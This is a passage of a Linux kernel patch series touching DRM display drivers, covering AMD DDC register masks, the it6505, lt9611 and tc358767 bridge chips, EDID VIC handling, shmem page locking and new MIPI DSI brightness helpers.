+ 	DDC_MASK_SH_LIST_DCN2(__SHIFT, 5),
+-	DDC_MASK_SH_LIST_DCN2(__SHIFT, 6)
++	DDC_MASK_SH_LIST_DCN2(__SHIFT, 6),
++	DDC_MASK_SH_LIST_DCN2_VGA(__SHIFT)
+ };
+ 
+ static const struct ddc_sh_mask ddc_mask[] = {
+@@ -147,7 +148,8 @@ static const struct ddc_sh_mask ddc_mask[] = {
+ 	DDC_MASK_SH_LIST_DCN2(_MASK, 3),
+ 	DDC_MASK_SH_LIST_DCN2(_MASK, 4),
+ 	DDC_MASK_SH_LIST_DCN2(_MASK, 5),
+-	DDC_MASK_SH_LIST_DCN2(_MASK, 6)
++	DDC_MASK_SH_LIST_DCN2(_MASK, 6),
++	DDC_MASK_SH_LIST_DCN2_VGA(_MASK)
+ };
+ 
+ #include "../generic_regs.h"
+diff --git a/drivers/gpu/drm/amd/display/dc/gpio/dcn30/hw_factory_dcn30.c b/drivers/gpu/drm/amd/display/dc/gpio/dcn30/hw_factory_dcn30.c
+index 687d4f128480e..36a5736c58c92 100644
+--- a/drivers/gpu/drm/amd/display/dc/gpio/dcn30/hw_factory_dcn30.c
++++ b/drivers/gpu/drm/amd/display/dc/gpio/dcn30/hw_factory_dcn30.c
+@@ -145,7 +145,8 @@ static const struct ddc_sh_mask ddc_shift[] = {
+ 	DDC_MASK_SH_LIST_DCN2(__SHIFT, 3),
+ 	DDC_MASK_SH_LIST_DCN2(__SHIFT, 4),
+ 	DDC_MASK_SH_LIST_DCN2(__SHIFT, 5),
+-	DDC_MASK_SH_LIST_DCN2(__SHIFT, 6)
++	DDC_MASK_SH_LIST_DCN2(__SHIFT, 6),
++	DDC_MASK_SH_LIST_DCN2_VGA(__SHIFT)
+ };
+ 
+ static const struct ddc_sh_mask ddc_mask[] = {
+@@ -154,7 +155,8 @@ static const struct ddc_sh_mask ddc_mask[] = {
+ 	DDC_MASK_SH_LIST_DCN2(_MASK, 3),
+ 	DDC_MASK_SH_LIST_DCN2(_MASK, 4),
+ 	DDC_MASK_SH_LIST_DCN2(_MASK, 5),
+-	DDC_MASK_SH_LIST_DCN2(_MASK, 6)
++	DDC_MASK_SH_LIST_DCN2(_MASK, 6),
++	DDC_MASK_SH_LIST_DCN2_VGA(_MASK)
+ };
+ 
+ #include "../generic_regs.h"
+diff --git a/drivers/gpu/drm/amd/display/dc/gpio/dcn32/hw_factory_dcn32.c b/drivers/gpu/drm/amd/display/dc/gpio/dcn32/hw_factory_dcn32.c
+index 9fd8b269dd79c..985f10b397509 100644
+--- a/drivers/gpu/drm/amd/display/dc/gpio/dcn32/hw_factory_dcn32.c
++++ b/drivers/gpu/drm/amd/display/dc/gpio/dcn32/hw_factory_dcn32.c
+@@ -149,7 +149,8 @@ static const struct ddc_sh_mask ddc_shift[] = {
+ 	DDC_MASK_SH_LIST_DCN2(__SHIFT, 3),
+ 	DDC_MASK_SH_LIST_DCN2(__SHIFT, 4),
+ 	DDC_MASK_SH_LIST_DCN2(__SHIFT, 5),
+-	DDC_MASK_SH_LIST_DCN2(__SHIFT, 6)
++	DDC_MASK_SH_LIST_DCN2(__SHIFT, 6),
++	DDC_MASK_SH_LIST_DCN2_VGA(__SHIFT)
+ };
+ 
+ static const struct ddc_sh_mask ddc_mask[] = {
+@@ -158,7 +159,8 @@ static const struct ddc_sh_mask ddc_mask[] = {
+ 	DDC_MASK_SH_LIST_DCN2(_MASK, 3),
+ 	DDC_MASK_SH_LIST_DCN2(_MASK, 4),
+ 	DDC_MASK_SH_LIST_DCN2(_MASK, 5),
+-	DDC_MASK_SH_LIST_DCN2(_MASK, 6)
++	DDC_MASK_SH_LIST_DCN2(_MASK, 6),
++	DDC_MASK_SH_LIST_DCN2_VGA(_MASK)
+ };
+ 
+ #include "../generic_regs.h"
+diff --git a/drivers/gpu/drm/amd/display/dc/gpio/ddc_regs.h b/drivers/gpu/drm/amd/display/dc/gpio/ddc_regs.h
+index 308a543178a56..59884ef651b39 100644
+--- a/drivers/gpu/drm/amd/display/dc/gpio/ddc_regs.h
++++ b/drivers/gpu/drm/amd/display/dc/gpio/ddc_regs.h
+@@ -113,6 +113,13 @@
+ 	(PHY_AUX_CNTL__AUX## cd ##_PAD_RXSEL## mask_sh),\
+ 	(DC_GPIO_AUX_CTRL_5__DDC_PAD## cd ##_I2CMODE## mask_sh)}
+ 
++#define DDC_MASK_SH_LIST_DCN2_VGA(mask_sh) \
++	{DDC_MASK_SH_LIST_COMMON(mask_sh),\
++	0,\
++	0,\
++	0,\
++	0}
++
+ struct ddc_registers {
+ 	struct gpio_registers gpio;
+ 	uint32_t ddc_setup;
+diff --git a/drivers/gpu/drm/amd/display/dc/inc/hw/timing_generator.h b/drivers/gpu/drm/amd/display/dc/inc/hw/timing_generator.h
+index 0e42e721dd15a..1d9f9c53d2bd6 100644
+--- a/drivers/gpu/drm/amd/display/dc/inc/hw/timing_generator.h
++++ b/drivers/gpu/drm/amd/display/dc/inc/hw/timing_generator.h
+@@ -331,6 +331,7 @@ struct timing_generator_funcs {
+ 			uint32_t vtotal_change_limit);
+ 
+ 	void (*init_odm)(struct timing_generator *tg);
++	void (*wait_drr_doublebuffer_pending_clear)(struct timing_generator *tg);
+ };
+ 
+ #endif
+diff --git a/drivers/gpu/drm/amd/include/amd_shared.h b/drivers/gpu/drm/amd/include/amd_shared.h
+index f175e65b853a0..e4a22c68517d1 100644
+--- a/drivers/gpu/drm/amd/include/amd_shared.h
++++ b/drivers/gpu/drm/amd/include/amd_shared.h
+@@ -240,6 +240,7 @@ enum DC_FEATURE_MASK {
+ 	DC_DISABLE_LTTPR_DP2_0 = (1 << 6), //0x40, disabled by default
+ 	DC_PSR_ALLOW_SMU_OPT = (1 << 7), //0x80, disabled by default
+ 	DC_PSR_ALLOW_MULTI_DISP_OPT = (1 << 8), //0x100, disabled by default
++	DC_ENABLE_SUBVP_DRR = (1 << 9), // 0x200, disabled by default
+ };
+ 
+ enum DC_DEBUG_MASK {
+diff --git a/drivers/gpu/drm/ast/ast_mode.c b/drivers/gpu/drm/ast/ast_mode.c
+index 66a4a41c3fe94..d314b9e7c05f9 100644
+--- a/drivers/gpu/drm/ast/ast_mode.c
++++ b/drivers/gpu/drm/ast/ast_mode.c
+@@ -636,7 +636,7 @@ static void ast_handle_damage(struct ast_plane *ast_plane, struct iosys_map *src
+ 			      struct drm_framebuffer *fb,
+ 			      const struct drm_rect *clip)
+ {
+-	struct iosys_map dst = IOSYS_MAP_INIT_VADDR(ast_plane->vaddr);
++	struct iosys_map dst = IOSYS_MAP_INIT_VADDR_IOMEM(ast_plane->vaddr);
+ 
+ 	iosys_map_incr(&dst, drm_fb_clip_offset(fb->pitches[0], fb->format, clip));
+ 	drm_fb_memcpy(&dst, fb->pitches, src, fb, clip);
+diff --git a/drivers/gpu/drm/bridge/ite-it6505.c b/drivers/gpu/drm/bridge/ite-it6505.c
+index 21a9b8422bda5..e7f7d0ce13805 100644
+--- a/drivers/gpu/drm/bridge/ite-it6505.c
++++ b/drivers/gpu/drm/bridge/ite-it6505.c
+@@ -412,7 +412,6 @@ struct it6505 {
+ 	 * Mutex protects extcon and interrupt functions from interfering
+ 	 * each other.
+ 	 */
+-	struct mutex irq_lock;
+ 	struct mutex extcon_lock;
+ 	struct mutex mode_lock; /* used to bridge_detect */
+ 	struct mutex aux_lock; /* used to aux data transfers */
+@@ -2494,10 +2493,8 @@ static irqreturn_t it6505_int_threaded_handler(int unused, void *data)
+ 	};
+ 	int int_status[3], i;
+ 
+-	mutex_lock(&it6505->irq_lock);
+-
+-	if (it6505->enable_drv_hold || !it6505->powered)
+-		goto unlock;
++	if (it6505->enable_drv_hold || pm_runtime_get_if_in_use(dev) <= 0)
++		return IRQ_HANDLED;
+ 
+ 	int_status[0] = it6505_read(it6505, INT_STATUS_01);
+ 	int_status[1] = it6505_read(it6505, INT_STATUS_02);
+@@ -2515,16 +2512,14 @@ static irqreturn_t it6505_int_threaded_handler(int unused, void *data)
+ 	if (it6505_test_bit(irq_vec[0].bit, (unsigned int *)int_status))
+ 		irq_vec[0].handler(it6505);
+ 
+-	if (!it6505->hpd_state)
+-		goto unlock;
+-
+-	for (i = 1; i < ARRAY_SIZE(irq_vec); i++) {
+-		if (it6505_test_bit(irq_vec[i].bit, (unsigned int *)int_status))
+-			irq_vec[i].handler(it6505);
++	if (it6505->hpd_state) {
++		for (i = 1; i < ARRAY_SIZE(irq_vec); i++) {
++			if (it6505_test_bit(irq_vec[i].bit, (unsigned int *)int_status))
++				irq_vec[i].handler(it6505);
++		}
+ 	}
+ 
+-unlock:
+-	mutex_unlock(&it6505->irq_lock);
++	pm_runtime_put_sync(dev);
+ 
+ 	return IRQ_HANDLED;
+ }
+@@ -3277,7 +3272,6 @@ static int it6505_i2c_probe(struct i2c_client *client,
+ 	if (!it6505)
+ 		return -ENOMEM;
+ 
+-	mutex_init(&it6505->irq_lock);
+ 	mutex_init(&it6505->extcon_lock);
+ 	mutex_init(&it6505->mode_lock);
+ 	mutex_init(&it6505->aux_lock);
+diff --git a/drivers/gpu/drm/bridge/lontium-lt9611.c b/drivers/gpu/drm/bridge/lontium-lt9611.c
+index 7c0a99173b39f..3b77238ca4aff 100644
+--- a/drivers/gpu/drm/bridge/lontium-lt9611.c
++++ b/drivers/gpu/drm/bridge/lontium-lt9611.c
+@@ -187,12 +187,14 @@ static void lt9611_mipi_video_setup(struct lt9611 *lt9611,
+ 
+ 	regmap_write(lt9611->regmap, 0x8319, (u8)(hfront_porch % 256));
+ 
+-	regmap_write(lt9611->regmap, 0x831a, (u8)(hsync_porch / 256));
++	regmap_write(lt9611->regmap, 0x831a, (u8)(hsync_porch / 256) |
++						((hfront_porch / 256) << 4));
+ 	regmap_write(lt9611->regmap, 0x831b, (u8)(hsync_porch % 256));
+ }
+ 
+-static void lt9611_pcr_setup(struct lt9611 *lt9611, const struct drm_display_mode *mode)
++static void lt9611_pcr_setup(struct lt9611 *lt9611, const struct drm_display_mode *mode, unsigned int postdiv)
+ {
++	unsigned int pcr_m = mode->clock * 5 * postdiv / 27000;
+ 	const struct reg_sequence reg_cfg[] = {
+ 		{ 0x830b, 0x01 },
+ 		{ 0x830c, 0x10 },
+@@ -207,7 +209,6 @@ static void lt9611_pcr_setup(struct lt9611 *lt9611, const struct drm_display_mod
+ 
+ 		/* stage 2 */
+ 		{ 0x834a, 0x40 },
+-		{ 0x831d, 0x10 },
+ 
+ 		/* MK limit */
+ 		{ 0x832d, 0x38 },
+@@ -222,30 +223,28 @@ static void lt9611_pcr_setup(struct lt9611 *lt9611, const struct drm_display_mod
+ 		{ 0x8325, 0x00 },
+ 		{ 0x832a, 0x01 },
+ 		{ 0x834a, 0x10 },
+-		{ 0x831d, 0x10 },
+-		{ 0x8326, 0x37 },
+ 	};
++	u8 pol = 0x10;
+ 
+-	regmap_multi_reg_write(lt9611->regmap, reg_cfg, ARRAY_SIZE(reg_cfg));
++	if (mode->flags & DRM_MODE_FLAG_NHSYNC)
++		pol |= 0x2;
++	if (mode->flags & DRM_MODE_FLAG_NVSYNC)
++		pol |= 0x1;
++	regmap_write(lt9611->regmap, 0x831d, pol);
+ 
+-	switch (mode->hdisplay) {
+-	case 640:
+-		regmap_write(lt9611->regmap, 0x8326, 0x14);
+-		break;
+-	case 1920:
+-		regmap_write(lt9611->regmap, 0x8326, 0x37);
+-		break;
+-	case 3840:
++	if (mode->hdisplay == 3840)
+ 		regmap_multi_reg_write(lt9611->regmap, reg_cfg2, ARRAY_SIZE(reg_cfg2));
+-		break;
+-	}
++	else
++		regmap_multi_reg_write(lt9611->regmap, reg_cfg, ARRAY_SIZE(reg_cfg));
++
++	regmap_write(lt9611->regmap, 0x8326, pcr_m);
+ 
+ 	/* pcr rst */
+ 	regmap_write(lt9611->regmap, 0x8011, 0x5a);
+ 	regmap_write(lt9611->regmap, 0x8011, 0xfa);
+ }
+ 
+-static int lt9611_pll_setup(struct lt9611 *lt9611, const struct drm_display_mode *mode)
++static int lt9611_pll_setup(struct lt9611 *lt9611, const struct drm_display_mode *mode, unsigned int *postdiv)
+ {
+ 	unsigned int pclk = mode->clock;
+ 	const struct reg_sequence reg_cfg[] = {
+@@ -263,12 +262,16 @@ static int lt9611_pll_setup(struct lt9611 *lt9611, const struct drm_display_mode
+ 
+ 	regmap_multi_reg_write(lt9611->regmap, reg_cfg, ARRAY_SIZE(reg_cfg));
+ 
+-	if (pclk > 150000)
++	if (pclk > 150000) {
+ 		regmap_write(lt9611->regmap, 0x812d, 0x88);
+-	else if (pclk > 70000)
++		*postdiv = 1;
++	} else if (pclk > 70000) {
+ 		regmap_write(lt9611->regmap, 0x812d, 0x99);
+-	else
++		*postdiv = 2;
++	} else {
+ 		regmap_write(lt9611->regmap, 0x812d, 0xaa);
++		*postdiv = 4;
++	}
+ 
+ 	/*
+ 	 * first divide pclk by 2 first
+@@ -448,12 +451,11 @@ static void lt9611_sleep_setup(struct lt9611 *lt9611)
+ 		{ 0x8023, 0x01 },
+ 		{ 0x8157, 0x03 }, /* set addr pin as output */
+ 		{ 0x8149, 0x0b },
+-		{ 0x8151, 0x30 }, /* disable IRQ */
++
+ 		{ 0x8102, 0x48 }, /* MIPI Rx power down */
+ 		{ 0x8123, 0x80 },
+ 		{ 0x8130, 0x00 },
+-		{ 0x8100, 0x01 }, /* bandgap power down */
+-		{ 0x8101, 0x00 }, /* system clk power down */
++		{ 0x8011, 0x0a },
+ 	};
+ 
+ 	regmap_multi_reg_write(lt9611->regmap,
+@@ -767,7 +769,7 @@ static const struct drm_connector_funcs lt9611_bridge_connector_funcs = {
+ static struct mipi_dsi_device *lt9611_attach_dsi(struct lt9611 *lt9611,
+ 						 struct device_node *dsi_node)
+ {
+-	const struct mipi_dsi_device_info info = { "lt9611", 0, NULL };
++	const struct mipi_dsi_device_info info = { "lt9611", 0, lt9611->dev->of_node};
+ 	struct mipi_dsi_device *dsi;
+ 	struct mipi_dsi_host *host;
+ 	struct device *dev = lt9611->dev;
+@@ -857,12 +859,18 @@ static enum drm_mode_status lt9611_bridge_mode_valid(struct drm_bridge *bridge,
+ static void lt9611_bridge_pre_enable(struct drm_bridge *bridge)
+ {
+ 	struct lt9611 *lt9611 = bridge_to_lt9611(bridge);
++	static const struct reg_sequence reg_cfg[] = {
++		{ 0x8102, 0x12 },
++		{ 0x8123, 0x40 },
++		{ 0x8130, 0xea },
++		{ 0x8011, 0xfa },
++	};
+ 
+ 	if (!lt9611->sleep)
+ 		return;
+ 
+-	lt9611_reset(lt9611);
+-	regmap_write(lt9611->regmap, 0x80ee, 0x01);
++	regmap_multi_reg_write(lt9611->regmap,
++			       reg_cfg, ARRAY_SIZE(reg_cfg));
+ 
+ 	lt9611->sleep = false;
+ }
+@@ -882,14 +890,15 @@ static void lt9611_bridge_mode_set(struct drm_bridge *bridge,
+ {
+ 	struct lt9611 *lt9611 = bridge_to_lt9611(bridge);
+ 	struct hdmi_avi_infoframe avi_frame;
++	unsigned int postdiv;
+ 	int ret;
+ 
+ 	lt9611_bridge_pre_enable(bridge);
+ 
+ 	lt9611_mipi_input_digital(lt9611, mode);
+-	lt9611_pll_setup(lt9611, mode);
++	lt9611_pll_setup(lt9611, mode, &postdiv);
+ 	lt9611_mipi_video_setup(lt9611, mode);
+-	lt9611_pcr_setup(lt9611, mode);
++	lt9611_pcr_setup(lt9611, mode, postdiv);
+ 
+ 	ret = drm_hdmi_avi_infoframe_from_display_mode(&avi_frame,
+ 						       &lt9611->connector,
+diff --git a/drivers/gpu/drm/bridge/megachips-stdpxxxx-ge-b850v3-fw.c b/drivers/gpu/drm/bridge/megachips-stdpxxxx-ge-b850v3-fw.c
+index 97359f807bfc3..cbfa05a6767b5 100644
+--- a/drivers/gpu/drm/bridge/megachips-stdpxxxx-ge-b850v3-fw.c
++++ b/drivers/gpu/drm/bridge/megachips-stdpxxxx-ge-b850v3-fw.c
+@@ -440,7 +440,11 @@ static int __init stdpxxxx_ge_b850v3_init(void)
+ 	if (ret)
+ 		return ret;
+ 
+-	return i2c_add_driver(&stdp2690_ge_b850v3_fw_driver);
++	ret = i2c_add_driver(&stdp2690_ge_b850v3_fw_driver);
++	if (ret)
++		i2c_del_driver(&stdp4028_ge_b850v3_fw_driver);
++
++	return ret;
+ }
+ module_init(stdpxxxx_ge_b850v3_init);
+ 
+diff --git a/drivers/gpu/drm/bridge/tc358767.c b/drivers/gpu/drm/bridge/tc358767.c
+index 2a58eb271f701..b9b681086fc49 100644
+--- a/drivers/gpu/drm/bridge/tc358767.c
++++ b/drivers/gpu/drm/bridge/tc358767.c
+@@ -1264,10 +1264,10 @@ static int tc_dsi_rx_enable(struct tc_data *tc)
+ 	u32 value;
+ 	int ret;
+ 
+-	regmap_write(tc->regmap, PPI_D0S_CLRSIPOCOUNT, 5);
+-	regmap_write(tc->regmap, PPI_D1S_CLRSIPOCOUNT, 5);
+-	regmap_write(tc->regmap, PPI_D2S_CLRSIPOCOUNT, 5);
+-	regmap_write(tc->regmap, PPI_D3S_CLRSIPOCOUNT, 5);
++	regmap_write(tc->regmap, PPI_D0S_CLRSIPOCOUNT, 25);
++	regmap_write(tc->regmap, PPI_D1S_CLRSIPOCOUNT, 25);
++	regmap_write(tc->regmap, PPI_D2S_CLRSIPOCOUNT, 25);
++	regmap_write(tc->regmap, PPI_D3S_CLRSIPOCOUNT, 25);
+ 	regmap_write(tc->regmap, PPI_D0S_ATMR, 0);
+ 	regmap_write(tc->regmap, PPI_D1S_ATMR, 0);
+ 	regmap_write(tc->regmap, PPI_TX_RX_TA, TTA_GET | TTA_SURE);
+diff --git a/drivers/gpu/drm/bridge/ti-sn65dsi83.c b/drivers/gpu/drm/bridge/ti-sn65dsi83.c
+index 7ba9467fff129..047c14ddbbf11 100644
+--- a/drivers/gpu/drm/bridge/ti-sn65dsi83.c
++++ b/drivers/gpu/drm/bridge/ti-sn65dsi83.c
+@@ -346,7 +346,7 @@ static void sn65dsi83_atomic_enable(struct drm_bridge *bridge,
+ 
+ 	/* Deassert reset */
+ 	gpiod_set_value_cansleep(ctx->enable_gpio, 1);
+-	usleep_range(1000, 1100);
++	usleep_range(10000, 11000);
+ 
+ 	/* Get the LVDS format from the bridge state. */
+ 	bridge_state = drm_atomic_get_new_bridge_state(state, bridge);
+diff --git a/drivers/gpu/drm/drm_client.c b/drivers/gpu/drm/drm_client.c
+index 056ab9d5f313b..313cbabb12b2d 100644
+--- a/drivers/gpu/drm/drm_client.c
++++ b/drivers/gpu/drm/drm_client.c
+@@ -198,6 +198,11 @@ void drm_client_dev_hotplug(struct drm_device *dev)
+ 	if (!drm_core_check_feature(dev, DRIVER_MODESET))
+ 		return;
+ 
++	if (!dev->mode_config.num_connector) {
++		drm_dbg_kms(dev, "No connectors found, will not send hotplug events!\n");
++		return;
++	}
++
+ 	mutex_lock(&dev->clientlist_mutex);
+ 	list_for_each_entry(client, &dev->clientlist, list) {
+ 		if (!client->funcs || !client->funcs->hotplug)
+diff --git a/drivers/gpu/drm/drm_edid.c b/drivers/gpu/drm/drm_edid.c
+index 3841aba17abdc..b94adb9bbefb8 100644
+--- a/drivers/gpu/drm/drm_edid.c
++++ b/drivers/gpu/drm/drm_edid.c
+@@ -5249,13 +5249,12 @@ static int add_cea_modes(struct drm_connector *connector,
+ {
+ 	const struct cea_db *db;
+ 	struct cea_db_iter iter;
++	const u8 *hdmi = NULL, *video = NULL;
++	u8 hdmi_len = 0, video_len = 0;
+ 	int modes = 0;
+ 
+ 	cea_db_iter_edid_begin(drm_edid, &iter);
+ 	cea_db_iter_for_each(db, &iter) {
+-		const u8 *hdmi = NULL, *video = NULL;
+-		u8 hdmi_len = 0, video_len = 0;
+-
+ 		if (cea_db_tag(db) == CTA_DB_VIDEO) {
+ 			video = cea_db_data(db);
+ 			video_len = cea_db_payload_len(db);
+@@ -5271,18 +5270,17 @@ static int add_cea_modes(struct drm_connector *connector,
+ 			modes += do_y420vdb_modes(connector, vdb420,
+ 						  cea_db_payload_len(db) - 1);
+ 		}
+-
+-		/*
+-		 * We parse the HDMI VSDB after having added the cea modes as we
+-		 * will be patching their flags when the sink supports stereo
+-		 * 3D.
+-		 */
+-		if (hdmi)
+-			modes += do_hdmi_vsdb_modes(connector, hdmi, hdmi_len,
+-						    video, video_len);
+ 	}
+ 	cea_db_iter_end(&iter);
+ 
++	/*
++	 * We parse the HDMI VSDB after having added the cea modes as we will be
++	 * patching their flags when the sink supports stereo 3D.
++	 */
++	if (hdmi)
++		modes += do_hdmi_vsdb_modes(connector, hdmi, hdmi_len,
++					    video, video_len);
++
+ 	return modes;
+ }
+ 
+@@ -6885,8 +6883,6 @@ static u8 drm_mode_hdmi_vic(const struct drm_connector *connector,
+ static u8 drm_mode_cea_vic(const struct drm_connector *connector,
+ 			   const struct drm_display_mode *mode)
+ {
+-	u8 vic;
+-
+ 	/*
+ 	 * HDMI spec says if a mode is found in HDMI 1.4b 4K modes
+ 	 * we should send its VIC in vendor infoframes, else send the
+@@ -6896,13 +6892,18 @@ static u8 drm_mode_cea_vic(const struct drm_connector *connector,
+ 	if (drm_mode_hdmi_vic(connector, mode))
+ 		return 0;
+ 
+-	vic = drm_match_cea_mode(mode);
++	return drm_match_cea_mode(mode);
++}
+ 
+-	/*
+-	 * HDMI 1.4 VIC range: 1 <= VIC <= 64 (CEA-861-D) but
+-	 * HDMI 2.0 VIC range: 1 <= VIC <= 107 (CEA-861-F). So we
+-	 * have to make sure we dont break HDMI 1.4 sinks.
+-	 */
++/*
++ * Avoid sending VICs defined in HDMI 2.0 in AVI infoframes to sinks that
++ * conform to HDMI 1.4.
++ *
++ * HDMI 1.4 (CTA-861-D) VIC range: [1..64]
++ * HDMI 2.0 (CTA-861-F) VIC range: [1..107]
++ */
++static u8 vic_for_avi_infoframe(const struct drm_connector *connector, u8 vic)
++{
+ 	if (!is_hdmi2_sink(connector) && vic > 64)
+ 		return 0;
+ 
+@@ -6978,7 +6979,7 @@ drm_hdmi_avi_infoframe_from_display_mode(struct hdmi_avi_infoframe *frame,
+ 		picture_aspect = HDMI_PICTURE_ASPECT_NONE;
+ 	}
+ 
+-	frame->video_code = vic;
++	frame->video_code = vic_for_avi_infoframe(connector, vic);
+ 	frame->picture_aspect = picture_aspect;
+ 	frame->active_aspect = HDMI_ACTIVE_ASPECT_PICTURE;
+ 	frame->scan_mode = HDMI_SCAN_MODE_UNDERSCAN;
+diff --git a/drivers/gpu/drm/drm_fbdev_generic.c b/drivers/gpu/drm/drm_fbdev_generic.c
+index 593aa3283792b..215fe16ff1fb4 100644
+--- a/drivers/gpu/drm/drm_fbdev_generic.c
++++ b/drivers/gpu/drm/drm_fbdev_generic.c
+@@ -390,11 +390,6 @@ static int drm_fbdev_client_hotplug(struct drm_client_dev *client)
+ 	if (dev->fb_helper)
+ 		return drm_fb_helper_hotplug_event(dev->fb_helper);
+ 
+-	if (!dev->mode_config.num_connector) {
+-		drm_dbg_kms(dev, "No connectors found, will not create framebuffer!\n");
+-		return 0;
+-	}
+-
+ 	drm_fb_helper_prepare(dev, fb_helper, &drm_fb_helper_generic_funcs);
+ 
+ 	ret = drm_fb_helper_init(dev, fb_helper);
+diff --git a/drivers/gpu/drm/drm_fourcc.c b/drivers/gpu/drm/drm_fourcc.c
+index 6242dfbe92402..0f17dfa8702b4 100644
+--- a/drivers/gpu/drm/drm_fourcc.c
++++ b/drivers/gpu/drm/drm_fourcc.c
+@@ -190,6 +190,10 @@ const struct drm_format_info *__drm_format_info(u32 format)
+ 		{ .format = DRM_FORMAT_BGRA5551,	.depth = 15, .num_planes = 1, .cpp = { 2, 0, 0 }, .hsub = 1, .vsub = 1, .has_alpha = true },
+ 		{ .format = DRM_FORMAT_RGB565,		.depth = 16, .num_planes = 1, .cpp = { 2, 0, 0 }, .hsub = 1, .vsub = 1 },
+ 		{ .format = DRM_FORMAT_BGR565,		.depth = 16, .num_planes = 1, .cpp = { 2, 0, 0 }, .hsub = 1, .vsub = 1 },
++#ifdef __BIG_ENDIAN
++		{ .format = DRM_FORMAT_XRGB1555 | DRM_FORMAT_BIG_ENDIAN, .depth = 15, .num_planes = 1, .cpp = { 2, 0, 0 }, .hsub = 1, .vsub = 1 },
++		{ .format = DRM_FORMAT_RGB565 | DRM_FORMAT_BIG_ENDIAN, .depth = 16, .num_planes = 1, .cpp = { 2, 0, 0 }, .hsub = 1, .vsub = 1 },
++#endif
+ 		{ .format = DRM_FORMAT_RGB888,		.depth = 24, .num_planes = 1, .cpp = { 3, 0, 0 }, .hsub = 1, .vsub = 1 },
+ 		{ .format = DRM_FORMAT_BGR888,		.depth = 24, .num_planes = 1, .cpp = { 3, 0, 0 }, .hsub = 1, .vsub = 1 },
+ 		{ .format = DRM_FORMAT_XRGB8888,	.depth = 24, .num_planes = 1, .cpp = { 4, 0, 0 }, .hsub = 1, .vsub = 1 },
+diff --git a/drivers/gpu/drm/drm_gem_shmem_helper.c b/drivers/gpu/drm/drm_gem_shmem_helper.c
+index b602cd72a1205..7af9da886d4e5 100644
+--- a/drivers/gpu/drm/drm_gem_shmem_helper.c
++++ b/drivers/gpu/drm/drm_gem_shmem_helper.c
+@@ -681,23 +681,7 @@ struct sg_table *drm_gem_shmem_get_sg_table(struct drm_gem_shmem_object *shmem)
+ }
+ EXPORT_SYMBOL_GPL(drm_gem_shmem_get_sg_table);
+ 
+-/**
+- * drm_gem_shmem_get_pages_sgt - Pin pages, dma map them, and return a
+- *				 scatter/gather table for a shmem GEM object.
+- * @shmem: shmem GEM object
+- *
+- * This function returns a scatter/gather table suitable for driver usage. If
+- * the sg table doesn't exist, the pages are pinned, dma-mapped, and a sg
+- * table created.
+- *
+- * This is the main function for drivers to get at backing storage, and it hides
+- * and difference between dma-buf imported and natively allocated objects.
+- * drm_gem_shmem_get_sg_table() should not be directly called by drivers.
+- *
+- * Returns:
+- * A pointer to the scatter/gather table of pinned pages or errno on failure.
+- */
+-struct sg_table *drm_gem_shmem_get_pages_sgt(struct drm_gem_shmem_object *shmem)
++static struct sg_table *drm_gem_shmem_get_pages_sgt_locked(struct drm_gem_shmem_object *shmem)
+ {
+ 	struct drm_gem_object *obj = &shmem->base;
+ 	int ret;
+@@ -708,7 +692,7 @@ struct sg_table *drm_gem_shmem_get_pages_sgt(struct drm_gem_shmem_object *shmem)
+ 
+ 	WARN_ON(obj->import_attach);
+ 
+-	ret = drm_gem_shmem_get_pages(shmem);
++	ret = drm_gem_shmem_get_pages_locked(shmem);
+ 	if (ret)
+ 		return ERR_PTR(ret);
+ 
+@@ -730,9 +714,39 @@ err_free_sgt:
+ 	sg_free_table(sgt);
+ 	kfree(sgt);
+ err_put_pages:
+-	drm_gem_shmem_put_pages(shmem);
++	drm_gem_shmem_put_pages_locked(shmem);
+ 	return ERR_PTR(ret);
+ }
++
++/**
++ * drm_gem_shmem_get_pages_sgt - Pin pages, dma map them, and return a
++ *				 scatter/gather table for a shmem GEM object.
++ * @shmem: shmem GEM object
++ *
++ * This function returns a scatter/gather table suitable for driver usage. If
++ * the sg table doesn't exist, the pages are pinned, dma-mapped, and a sg
++ * table created.
++ *
++ * This is the main function for drivers to get at backing storage, and it hides
++ * and difference between dma-buf imported and natively allocated objects.
++ * drm_gem_shmem_get_sg_table() should not be directly called by drivers.
++ *
++ * Returns:
++ * A pointer to the scatter/gather table of pinned pages or errno on failure.
++ */
++struct sg_table *drm_gem_shmem_get_pages_sgt(struct drm_gem_shmem_object *shmem)
++{
++	int ret;
++	struct sg_table *sgt;
++
++	ret = mutex_lock_interruptible(&shmem->pages_lock);
++	if (ret)
++		return ERR_PTR(ret);
++	sgt = drm_gem_shmem_get_pages_sgt_locked(shmem);
++	mutex_unlock(&shmem->pages_lock);
++
++	return sgt;
++}
+ EXPORT_SYMBOL_GPL(drm_gem_shmem_get_pages_sgt);
+ 
+ /**
+diff --git a/drivers/gpu/drm/drm_mipi_dsi.c b/drivers/gpu/drm/drm_mipi_dsi.c
+index 497ef4b6a90a4..4bc15fbd009d8 100644
+--- a/drivers/gpu/drm/drm_mipi_dsi.c
++++ b/drivers/gpu/drm/drm_mipi_dsi.c
+@@ -1224,6 +1224,58 @@ int mipi_dsi_dcs_get_display_brightness(struct mipi_dsi_device *dsi,
+ }
+ EXPORT_SYMBOL(mipi_dsi_dcs_get_display_brightness);
+ 
++/**
++ * mipi_dsi_dcs_set_display_brightness_large() - sets the 16-bit brightness value
++ *    of the display
++ * @dsi: DSI peripheral device
++ * @brightness: brightness value
++ *
++ * Return: 0 on success or a negative error code on failure.
++ */
++int mipi_dsi_dcs_set_display_brightness_large(struct mipi_dsi_device *dsi,
++					     u16 brightness)
++{
++	u8 payload[2] = { brightness >> 8, brightness & 0xff };
++	ssize_t err;
++
++	err = mipi_dsi_dcs_write(dsi, MIPI_DCS_SET_DISPLAY_BRIGHTNESS,
++				 payload, sizeof(payload));
++	if (err < 0)
++		return err;
++
++	return 0;
++}
++EXPORT_SYMBOL(mipi_dsi_dcs_set_display_brightness_large);
++
++/**
++ * mipi_dsi_dcs_get_display_brightness_large() - gets the current 16-bit
++ *    brightness value of the display
++ * @dsi: DSI peripheral device
++ * @brightness: brightness value
++ *
++ * Return: 0 on success or a negative error code on failure.
++ */
++int mipi_dsi_dcs_get_display_brightness_large(struct mipi_dsi_device *dsi,
++					     u16 *brightness)
++{
++	u8 brightness_be[2];
++	ssize_t err;
++
++	err = mipi_dsi_dcs_read(dsi, MIPI_DCS_GET_DISPLAY_BRIGHTNESS,
++				brightness_be, sizeof(brightness_be));
++	if (err <= 0) {
++		if (err == 0)
++			err = -ENODATA;
++
++		return err;
++	}
++
++	*brightness = (brightness_be[0] << 8) | brightness_be[1];
++
++	return 0;
++}
